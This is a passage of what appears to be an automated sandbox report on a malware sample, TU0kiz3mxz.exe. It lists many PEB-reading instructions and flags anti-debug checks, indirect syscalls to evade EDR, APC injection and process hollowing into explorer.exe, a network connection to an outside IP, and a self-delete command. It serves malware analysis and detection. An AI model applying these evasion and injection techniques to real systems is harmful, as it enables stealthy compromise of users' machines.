          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01164978 mov eax, dword ptr fs:[00000030h]3_2_01164978
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01164978 mov eax, dword ptr fs:[00000030h]3_2_01164978
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0110096E mov eax, dword ptr fs:[00000030h]3_2_0110096E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0110096E mov edx, dword ptr fs:[00000030h]3_2_0110096E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0110096E mov eax, dword ptr fs:[00000030h]3_2_0110096E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h]3_2_010C09AD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h]3_2_010C09AD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011489B3 mov esi, dword ptr fs:[00000030h]3_2_011489B3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h]3_2_011489B3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h]3_2_011489B3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118A9D3 mov eax, dword ptr fs:[00000030h]3_2_0118A9D3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011569C0 mov eax, dword ptr fs:[00000030h]3_2_011569C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F49D0 mov eax, dword ptr fs:[00000030h]3_2_010F49D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114E9E0 mov eax, dword ptr fs:[00000030h]3_2_0114E9E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h]3_2_010F29F9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h]3_2_010F29F9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114C810 mov eax, dword ptr fs:[00000030h]3_2_0114C810
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116483A mov eax, dword ptr fs:[00000030h]3_2_0116483A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116483A mov eax, dword ptr fs:[00000030h]3_2_0116483A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2835 mov ecx, dword ptr fs:[00000030h]3_2_010E2835
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA830 mov eax, dword ptr fs:[00000030h]3_2_010FA830
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D2840 mov ecx, dword ptr fs:[00000030h]3_2_010D2840
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4859 mov eax, dword ptr fs:[00000030h]3_2_010C4859
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4859 mov eax, dword ptr fs:[00000030h]3_2_010C4859
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F0854 mov eax, dword ptr fs:[00000030h]3_2_010F0854
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156870 mov eax, dword ptr fs:[00000030h]3_2_01156870
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156870 mov eax, dword ptr fs:[00000030h]3_2_01156870
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114E872 mov eax, dword ptr fs:[00000030h]3_2_0114E872
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114E872 mov eax, dword ptr fs:[00000030h]3_2_0114E872
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114C89D mov eax, dword ptr fs:[00000030h]3_2_0114C89D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0887 mov eax, dword ptr fs:[00000030h]3_2_010C0887
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE8C0 mov eax, dword ptr fs:[00000030h]3_2_010EE8C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011908C0 mov eax, dword ptr fs:[00000030h]3_2_011908C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC8F9 mov eax, dword ptr fs:[00000030h]3_2_010FC8F9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC8F9 mov eax, dword ptr fs:[00000030h]3_2_010FC8F9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118A8E4 mov eax, dword ptr fs:[00000030h]3_2_0118A8E4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EEB20 mov eax, dword ptr fs:[00000030h]3_2_010EEB20
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EEB20 mov eax, dword ptr fs:[00000030h]3_2_010EEB20
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01188B28 mov eax, dword ptr fs:[00000030h]3_2_01188B28
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01188B28 mov eax, dword ptr fs:[00000030h]3_2_01188B28
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116EB50 mov eax, dword ptr fs:[00000030h]3_2_0116EB50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01168B42 mov eax, dword ptr fs:[00000030h]3_2_01168B42
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156B40 mov eax, dword ptr fs:[00000030h]3_2_01156B40
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156B40 mov eax, dword ptr fs:[00000030h]3_2_01156B40
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118AB40 mov eax, dword ptr fs:[00000030h]3_2_0118AB40
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01174B4B mov eax, dword ptr fs:[00000030h]3_2_01174B4B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01174B4B mov eax, dword ptr fs:[00000030h]3_2_01174B4B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BCB7E mov eax, dword ptr fs:[00000030h]3_2_010BCB7E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01174BB0 mov eax, dword ptr fs:[00000030h]3_2_01174BB0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01174BB0 mov eax, dword ptr fs:[00000030h]3_2_01174BB0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0BBE mov eax, dword ptr fs:[00000030h]3_2_010D0BBE
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0BBE mov eax, dword ptr fs:[00000030h]3_2_010D0BBE
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h]3_2_010C0BCD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h]3_2_010C0BCD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h]3_2_010C0BCD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h]3_2_010E0BCB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h]3_2_010E0BCB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h]3_2_010E0BCB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116EBD0 mov eax, dword ptr fs:[00000030h]3_2_0116EBD0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114CBF0 mov eax, dword ptr fs:[00000030h]3_2_0114CBF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EEBFC mov eax, dword ptr fs:[00000030h]3_2_010EEBFC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h]3_2_010C8BF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h]3_2_010C8BF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h]3_2_010C8BF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114CA11 mov eax, dword ptr fs:[00000030h]3_2_0114CA11
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EEA2E mov eax, dword ptr fs:[00000030h]3_2_010EEA2E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FCA24 mov eax, dword ptr fs:[00000030h]3_2_010FCA24
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E4A35 mov eax, dword ptr fs:[00000030h]3_2_010E4A35
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E4A35 mov eax, dword ptr fs:[00000030h]3_2_010E4A35
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0A5B mov eax, dword ptr fs:[00000030h]3_2_010D0A5B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0A5B mov eax, dword ptr fs:[00000030h]3_2_010D0A5B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h]3_2_010C6A50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h]3_2_010FCA6F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h]3_2_010FCA6F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h]3_2_010FCA6F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113CA72 mov eax, dword ptr fs:[00000030h]3_2_0113CA72
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113CA72 mov eax, dword ptr fs:[00000030h]3_2_0113CA72
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116EA60 mov eax, dword ptr fs:[00000030h]3_2_0116EA60
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h]3_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194A80 mov eax, dword ptr fs:[00000030h]3_2_01194A80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8A90 mov edx, dword ptr fs:[00000030h]3_2_010F8A90
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8AA0 mov eax, dword ptr fs:[00000030h]3_2_010C8AA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8AA0 mov eax, dword ptr fs:[00000030h]3_2_010C8AA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01116AA4 mov eax, dword ptr fs:[00000030h]3_2_01116AA4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0AD0 mov eax, dword ptr fs:[00000030h]3_2_010C0AD0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01116ACC mov eax, dword ptr fs:[00000030h]3_2_01116ACC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01116ACC mov eax, dword ptr fs:[00000030h]3_2_01116ACC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01116ACC mov eax, dword ptr fs:[00000030h]3_2_01116ACC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F4AD0 mov eax, dword ptr fs:[00000030h]3_2_010F4AD0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F4AD0 mov eax, dword ptr fs:[00000030h]3_2_010F4AD0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FAAEE mov eax, dword ptr fs:[00000030h]3_2_010FAAEE
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FAAEE mov eax, dword ptr fs:[00000030h]3_2_010FAAEE
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01178D10 mov eax, dword ptr fs:[00000030h]3_2_01178D10
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01178D10 mov eax, dword ptr fs:[00000030h]3_2_01178D10
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DAD00 mov eax, dword ptr fs:[00000030h]3_2_010DAD00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DAD00 mov eax, dword ptr fs:[00000030h]3_2_010DAD00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DAD00 mov eax, dword ptr fs:[00000030h]3_2_010DAD00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F4D1D mov eax, dword ptr fs:[00000030h]3_2_010F4D1D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B6D10 mov eax, dword ptr fs:[00000030h]3_2_010B6D10
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B6D10 mov eax, dword ptr fs:[00000030h]3_2_010B6D10
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_004A79E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_004A79E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.169.48 80Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeNtClose: Indirect: 0x107A56C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeNtQueueApcThread: Indirect: 0x107A4F2Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 3C0000Jump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"Jump to behavior
          Source: explorer.exe, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000003.2638760347.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, explorer.exe, 0000000F.00000003.2638760347.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2643856571.0000000004EEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
          Source: explorer.exe, 00000004.00000002.2625555299.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707105236.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000004.00000000.1707824873.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.1707824873.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmans
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Users\user\Desktop\TU0kiz3mxz.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
